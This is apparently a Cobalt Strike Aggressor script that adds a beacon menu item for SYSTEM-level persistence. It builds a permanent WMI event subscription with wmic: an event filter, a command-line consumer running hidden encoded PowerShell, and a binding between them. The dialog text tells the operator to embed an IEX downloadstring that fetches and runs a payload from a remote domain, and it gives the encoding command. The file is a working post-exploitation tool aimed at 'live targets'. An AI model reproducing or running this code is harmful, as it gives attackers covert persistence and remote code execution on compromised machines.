#Permanent WMI Event using WMIC Persistence #Author: @r3dQu1nn #Generates a Custom WMI Event using WMIC for SYSTEM Level persistence on selected beacon #Very syntax heavy, Test first before using on live targets sub persistwmieventwmic { $bid = $1; $dialog = dialog("Permanent WMI Event using WMIC Persistence", %(eventfilter => "__EventFilter Name..", eventquery => "Event Query...(Win32 Classes)", eventconsumer => "CommandLineEventConsumer Name..(Must be different from __EventFilter Name)", commandline => "CommandLineTemplate Syntax..(powershell.exe -w hidden -enc)", payloadfile => "Encoded Payload String.."), lambda({ if ("$3['eventfilter']" ismatch '__EventFilter Name..' || "$3['eventquery']" ismatch 'Event Query...(Win32 Classes)' || "$3['eventconsumer']" ismatch 'CommandLineEventConsumer Name..(Must be different from __EventFilter Name)' || "$3['commandline']" ismatch 'CommandLineTemplate Syntax..(powershell.exe -w hidden)' || "$3['payloadfile']" ismatch 'Select Encoded Payload..') { berror($bid, "\c4Please enter a valid Custom __EventFilter Name, Event Query, CommandLineEventConsumer Name, Command Line Options, and the Encoded Payload File."); break; } else { bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __EventFilter CREATE Name="'.$3['eventfilter'].'", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="'.$3['eventquery'].'"'); bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH CommandLineEventConsumer CREATE Name="'.$3['eventconsumer'].'", CommandLineTemplate="'.$3['commandline']." ".split("/",$3['payloadfile'])[-1].'"'); bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"'.$3['eventfilter'].'\"", Consumer="CommandLineEventConsumer.Name=\"'.$3['eventconsumer'].'\""'); bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __EventFilter GET __RELPATH /FORMAT:list'); bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list'); bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __FilterToConsumerBinding GET __RELPATH /FORMAT:list'); } })); dialog_description($dialog, "Generates a Custom WMI Event using WMIC for SYSTEM Level persistence on selected beacon. **Syntax is heavy, Test before using on live targets. Encoded Payload must include IEX ((new-object new.webclient).downloadstring(http://yourdomain/payload.txt)) Utilize the following command to encode the payload correctly: cat payload.txt | iconv --to-code=UTF-16LE | base64** "); #base 64 encode IEX of the powershell one liner #cat payload.txt | iconv --to-code=UTF-16LE | base64 drow_text($dialog, "eventfilter", "Custom __EventFilter Name:"); drow_text($dialog, "eventquery", "Custom Event Query:"); drow_text($dialog, "eventconsumer", "Custom CommandLineEventConsumer Name:"); drow_text($dialog, "commandline", "Custom Command Line Options:"); drow_text($dialog, "payloadfile", "Custom Encoded Payload String:"); dbutton_action($dialog, "Create"); dialog_show($dialog); } popup beacon_bottom { item "&Permanent WMI Event using WMIC Persistence" { local('$bid'); foreach $bid ($1) { if (-isadmin $bid) { persistwmieventwmic($bid); } else { berror($1, "\c4Persistence Requires Admin Level Privileges"); } } } }